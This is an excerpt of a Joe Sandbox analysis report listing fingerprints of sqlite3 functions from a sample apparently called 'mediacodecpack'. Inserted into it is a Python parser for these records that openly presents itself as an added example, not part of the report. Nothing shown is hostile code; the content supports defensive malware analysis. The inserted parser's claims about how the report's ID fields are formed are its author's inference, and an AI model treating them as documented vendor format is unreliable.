                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_stricmp
                                                                                        • String ID: log
                                                                                        • API String ID: 912767213-2403297477
                                                                                        • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                        • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                                        • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                        • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_strnicmp
                                                                                        • String ID: SQLITE_
                                                                                        • API String ID: 1961171630-787686576
                                                                                        • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                        • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                                        • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                        • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                                        APIs
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                                        • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                                        Strings
                                                                                        • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                                        • String ID: Invalid argument to rtreedepth()
                                                                                        • API String ID: 1063208240-2843521569
                                                                                        • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                        • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                                        • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                        • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
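                                                                                        The records above are the report's per-function fingerprints for the sqlite3 module mapped at 60900000 in process 2; the page gives hundreds of them as flat text. The Python below is an added example, not part of the Joe Sandbox report, that parses that text into structured records so an analyst can filter by referenced string or cluster by API set. Field names follow the report; the parser, its helper names and the three-record SAMPLE_REPORT (a constructed excerpt copied from this page, with the repeated Memory Dump Source and IDA Plugin lines kept only in the first record) are the example's own. The hash function behind "API String ID" is not given by the report, so the value is only split, not recomputed.

```python
"""Parse the per-function records of a Joe Sandbox report (the 'APIs', 'Strings',
'Memory Dump Source' and 'Similarity' blocks) into dicts for filtering and
pivoting. SAMPLE_REPORT is a constructed excerpt of three records from this
report's sqlite3 module (added example; not the report's own tooling)."""
import re
from typing import Dict, List

SAMPLE_REPORT = """
APIs
  • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
• sqlite3_free.SQLITE3 ref: 609193A3
Strings
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_freesqlite3_value_text
• String ID: (NULL)$NULL
• API String ID: 2175239460-873412390
• Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
• Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
• Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
• Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
APIs
Strings
Similarity
• API ID: sqlite3_log
• String ID: string or blob too big$|
• API String ID: 632333372-330586046
• Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
• Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
• Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
• Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
APIs
• sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
• sqlite3_value_blob.SQLITE3 ref: 6091A1FA
Strings
• Invalid argument to rtreedepth(), xrefs: 6091A1E3
Similarity
• API ID: sqlite3_value_blobsqlite3_value_bytes
• String ID: Invalid argument to rtreedepth()
• API String ID: 1063208240-2843521569
• Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
• Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
• Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
• Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_REF = re.compile(r"(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                     r"(?P<api>\w+)\.(?P<mod>\w+) ref: (?P<ref>[0-9A-F]+)$")
STRING_REF = re.compile(r"(?P<text>.*), xrefs: (?P<ref>[0-9A-F]+)$")


def _finish(rec: Dict) -> Dict:
    """Type the Similarity fields once the record's last line has been seen."""
    sim = rec["similarity"]
    # 'API String ID' is <hash of API ID>-<hash of String ID>; on this page every
    # function with the same API ID shares the first part, so it is a cluster key.
    api_hash, _, str_hash = sim.get("API String ID", "").partition("-")
    rec["api_id"] = sim.get("API ID", "")
    rec["api_hash"] = int(api_hash) if api_hash.isdigit() else None
    rec["string_hash"] = int(str_hash) if str_hash.isdigit() else None
    sid = sim.get("String ID", "")
    rec["string_ids"] = sid.split("$") if sid else []  # report joins strings with '$'
    rec["opcode_id"] = sim.get("Opcode ID", "")
    rec["instruction_fuzzy_hash"] = sim.get("Instruction Fuzzy Hash", "")
    return rec


def parse_records(text: str) -> List[Dict]:
    """One dict per function; a record closes at its 'Instruction Fuzzy Hash' line."""
    records: List[Dict] = []
    cur, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            cur = cur or {"apis": [], "strings": [], "sources": [], "similarity": {}}
        elif line.startswith("•") and cur is not None:
            body = line.lstrip("• ").strip()
            if section == "APIs" and (m := API_REF.match(body)):
                cur["apis"].append({"api": m["api"], "module": m["mod"],
                                    "ref": int(m["ref"], 16), "subcall_of": m["sub"]})
            elif section == "Strings" and (m := STRING_REF.match(body)):
                cur["strings"].append({"text": m["text"], "xref": int(m["ref"], 16)})
            elif section == "Memory Dump Source":
                cur["sources"].append(body)
            elif section == "Similarity":
                key, _, value = body.partition(":")
                cur["similarity"][key.strip()] = value.strip()
                if key.strip() == "Instruction Fuzzy Hash":
                    records.append(_finish(cur))
                    cur = None
    return records


def functions_referencing(records: List[Dict], needle: str) -> List[str]:
    """Opcode IDs of functions whose String ID or Strings list mentions `needle`."""
    return [r["opcode_id"] for r in records
            if any(needle in s for s in r["string_ids"])
            or any(needle in s["text"] for s in r["strings"])]
```

                                                                                        Two caveats when using this on a full report: the "String ID" field is "$"-joined, so a string that itself contains "$" cannot be split unambiguously (fall back to the Strings list, which carries each string with its xref), and the "API ID" is the bare concatenation of the API names, which is why the per-API entries under APIs are the authoritative list. The first component of "API String ID" (632333372 for every sqlite3_log record on this page) is a convenient key for grouping functions that import the same API set across reports.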
                                                                                        APIs
                                                                                        • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                          • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                          • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                          • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                          • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                        • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Similarity
                                                                                        • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID: soft_heap_limit
                                                                                        • API String ID: 1251656441-405162809
                                                                                        APIs
                                                                                        • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                                        • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: NULL
                                                                                        • API String ID: 632333372-324932091
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeavefree
                                                                                        • String ID:
                                                                                        • API String ID: 4020351045-0
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                        • String ID:
                                                                                        • API String ID: 682475483-0